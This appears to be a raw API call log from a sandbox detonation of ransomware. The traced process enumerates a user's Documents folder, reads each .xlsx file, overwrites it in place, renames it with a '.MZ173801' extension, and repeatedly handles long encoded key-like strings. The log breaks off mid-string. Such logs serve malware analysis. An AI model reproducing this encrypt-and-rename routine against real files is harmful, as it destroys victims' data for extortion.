lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.142] GetCurrentThreadId () returned 0x1358 [0121.142] GetCurrentThreadId () returned 0x1358 [0121.142] GetCurrentThreadId () returned 0x1358 [0121.142] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\14yXf75kP-7umnG 4Xe.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\14yxf75kp-7umng 4xe.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.143] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.143] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.143] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x17950 [0121.143] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.143] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17950, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x17950, lpOverlapped=0x0) returned 1 [0121.144] CloseHandle (hObject=0x3fc) returned 1 [0121.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\14yXf75kP-7umnG 4Xe.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\14yxf75kp-7umng 4xe.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.147] WriteFile (in: hFile=0x3fc, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x17950, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x17950, lpOverlapped=0x0) returned 1 [0121.149] CloseHandle (hObject=0x3fc) returned 1 [0121.152] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\14yXf75kP-7umnG 4Xe.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\14yxf75kp-7umng 4xe.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\14yXf75kP-7umnG 4Xe.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\14yxf75kp-7umng 4xe.xlsx.mz173801")) returned 1 [0121.153] GetCurrentThreadId () returned 0x1358 [0121.153] GetCurrentThreadId () returned 0x1358 [0121.153] GetCurrentThreadId () returned 0x1358 [0121.153] GetCurrentThreadId () returned 0x1358 [0121.153] GetCurrentThreadId () returned 0x1358 [0121.153] GetCurrentThreadId () returned 0x1358 [0121.153] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x411301d0, ftCreationTime.dwHighDateTime=0x1d58d5c, ftLastAccessTime.dwLowDateTime=0xba362ef0, ftLastAccessTime.dwHighDateTime=0x1d5e8b7, ftLastWriteTime.dwLowDateTime=0xba362ef0, ftLastWriteTime.dwHighDateTime=0x1d5e8b7, nFileSizeHigh=0x0, nFileSizeLow=0x18e0d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="1wztFJUX4Pd41Ftwf.xlsx", cAlternateFileName="1WZTFJ~1.XLS")) returned 1 [0121.153] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.153] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.153] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\1wztFJUX4Pd41Ftwf.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\1wztfjux4pd41ftwf.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x411301d0, ftCreationTime.dwHighDateTime=0x1d58d5c, ftLastAccessTime.dwLowDateTime=0xba362ef0, ftLastAccessTime.dwHighDateTime=0x1d5e8b7, ftLastWriteTime.dwLowDateTime=0xba362ef0, ftLastWriteTime.dwHighDateTime=0x1d5e8b7, nFileSizeHigh=0x0, nFileSizeLow=0x18e0d)) returned 1 [0121.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.154] GetCurrentThreadId () returned 0x1358 [0121.154] GetCurrentThreadId () returned 0x1358 [0121.154] GetCurrentThreadId () returned 0x1358 [0121.154] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.154] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.155] GetCurrentThreadId () returned 0x1358 [0121.155] GetCurrentThreadId () returned 0x1358 [0121.155] GetCurrentThreadId () returned 0x1358 [0121.155] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\1wztFJUX4Pd41Ftwf.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\1wztfjux4pd41ftwf.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.155] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.155] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.155] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x18e0d [0121.155] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.155] ReadFile (in: hFile=0x3fc, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x18e0d, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f9b0*=0x18e0d, lpOverlapped=0x0) returned 1 [0121.156] CloseHandle (hObject=0x3fc) returned 1 [0121.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\1wztFJUX4Pd41Ftwf.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\1wztfjux4pd41ftwf.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.160] WriteFile (in: hFile=0x3fc, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x18e0d, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f9bc*=0x18e0d, lpOverlapped=0x0) returned 1 [0121.164] CloseHandle (hObject=0x3fc) returned 1 [0121.167] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\1wztFJUX4Pd41Ftwf.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\1wztfjux4pd41ftwf.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\1wztFJUX4Pd41Ftwf.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\1wztfjux4pd41ftwf.xlsx.mz173801")) returned 1 [0121.167] GetCurrentThreadId () returned 0x1358 [0121.167] GetCurrentThreadId () returned 0x1358 [0121.167] GetCurrentThreadId () returned 0x1358 [0121.167] GetCurrentThreadId () returned 0x1358 [0121.168] GetCurrentThreadId () returned 0x1358 [0121.168] GetCurrentThreadId () returned 0x1358 [0121.168] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffc180b0, ftCreationTime.dwHighDateTime=0x1d5bbd4, ftLastAccessTime.dwLowDateTime=0x174d0080, ftLastAccessTime.dwHighDateTime=0x1d5c439, ftLastWriteTime.dwLowDateTime=0x174d0080, ftLastWriteTime.dwHighDateTime=0x1d5c439, nFileSizeHigh=0x0, nFileSizeLow=0xa228, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="28RvPNiENM.xlsx", cAlternateFileName="28RVPN~1.XLS")) returned 1 [0121.168] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.168] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.168] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\28RvPNiENM.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\28rvpnienm.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffc180b0, ftCreationTime.dwHighDateTime=0x1d5bbd4, ftLastAccessTime.dwLowDateTime=0x174d0080, ftLastAccessTime.dwHighDateTime=0x1d5c439, ftLastWriteTime.dwLowDateTime=0x174d0080, ftLastWriteTime.dwHighDateTime=0x1d5c439, nFileSizeHigh=0x0, nFileSizeLow=0xa228)) returned 1 [0121.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM